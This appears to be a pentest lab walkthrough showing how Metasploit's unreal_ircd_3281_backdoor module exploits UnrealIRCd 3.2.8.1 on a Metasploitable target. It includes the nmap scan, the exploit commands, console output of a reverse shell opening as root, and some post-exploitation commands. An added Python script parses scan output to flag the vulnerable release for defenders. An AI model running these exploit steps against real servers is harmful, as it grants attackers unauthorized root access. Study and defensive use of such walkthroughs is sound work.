control – metasploit unreal_ircd_3281_backdoor

UnrealIRCd is an open-source IRC daemon, originally based on DreamForge, available for Unix-like operating systems and Windows. Since development began circa May 1999, many features have been added and modified, including advanced security features and bug fixes, and it has become a popular server.

root@bt:~# nmap -sV -sC -v -p 6667 IP-Address

6667/tcp open irc Unreal ircd
| irc-info: Server: irc.Metasploitable.LAN
| Version: Unreal3.2.8.1. irc.Metasploitable.LAN
| Lservers/Lusers: 0/1
| Uptime: 0 days, 0:04:32
|_Source ident: OK nmap
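
A defender-side triage of the scan output above, added here as an example and not part of the original post: it parses nmap's irc-info text for several hosts and marks those reporting the release this module is named for. The 192.0.2.x hosts, the second and third scan entries, and the status labels are constructed for illustration; a "review" result means the installed build should be checked against a trusted copy, since the version string alone does not confirm the backdoor.

```python
import re

# Constructed sample: irc-info block from the scan above (abridged) plus two made-up hosts.
SAMPLE_SCAN = """\
Nmap scan report for 192.0.2.10
6667/tcp open irc Unreal ircd
| irc-info: Server: irc.Metasploitable.LAN
| Version: Unreal3.2.8.1. irc.Metasploitable.LAN
| Uptime: 0 days, 0:04:32
|_Source ident: OK nmap
Nmap scan report for 192.0.2.11
6667/tcp open irc Unreal ircd
| irc-info: Server: irc.example.test
|_Version: Unreal3.2.10.4. irc.example.test
Nmap scan report for 192.0.2.12
6667/tcp open irc Unreal ircd
"""
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s*(.*)$")
FIELD_RE = re.compile(r"^\|_?\s*(?:irc-info:\s*)?([A-Za-z/ ]+?):\s*(.*)$")
FLAGGED_RELEASE = "Unreal3.2.8.1"  # release the module name refers to

def parse_scan(text):
    """Return one record per open port: host, port, banner, irc-info fields."""
    records, host, current = [], None, None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            host, current = m.group(1), None
        elif m := PORT_RE.match(line):
            current = {"host": host, "port": int(m.group(1)),
                       "banner": m.group(2).strip(), "info": {}}
            records.append(current)
        elif current is not None and (m := FIELD_RE.match(line)):
            current["info"][m.group(1).strip()] = m.group(2).strip()
    return records

def triage(record):
    """'review' = flagged release; 'no-version' = Unreal banner, no irc-info."""
    version = record["info"].get("Version", "")
    if not version:
        return "no-version" if "unreal" in record["banner"].lower() else "not-unreal"
    release = version.split()[0].rstrip(".")  # "Unreal3.2.8.1." -> "Unreal3.2.8.1"
    return "review" if release == FLAGGED_RELEASE else "other-version"

def report(text):
    return [(r["host"], r["port"], triage(r)) for r in parse_scan(text)]

if __name__ == "__main__":
    print(*report(SAMPLE_SCAN), sep="\n")
```

Hosts that come back as "no-version" answered with an Unreal banner but no irc-info fields, so they need a manual version check before being cleared.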

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf  exploit(unreal_ircd_3281_backdoor) > set rhost IP-Address
msf  exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ahaBucJmQvi2ONTC;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ahaBucJmQvi2ONTC\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Address:59446) at 2011-02-21 08:39:04 +0100


eth0      Link encap:Ethernet  HWaddr 01:02:03:04:05:06
inet addr:IP-Address Bcast:Address  Mask:Mask
RX packets:33523 errors:0 dropped:0 overruns:0 frame:0
TX packets:58400 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
Base address:0xd010 Memory:f0000000-f0020000

ls -l
total 388
-rw------- 1 root root   1365 Jan 20 14:08 Donation
-rw------- 1 root root  17992 Jan 20 14:08 LICENSE
drwx------ 2 root root   4096 Jan 20 14:08 aliases
--w----r-T 1 root root   1175 Jan 20 14:08
--w----r-T 1 root root   1183 Jan 20 14:08 badwords.message.conf
drwx------ 2 root root   4096 Jan 20 14:08 networks

cd networks

dir          networks.ndx                makenet

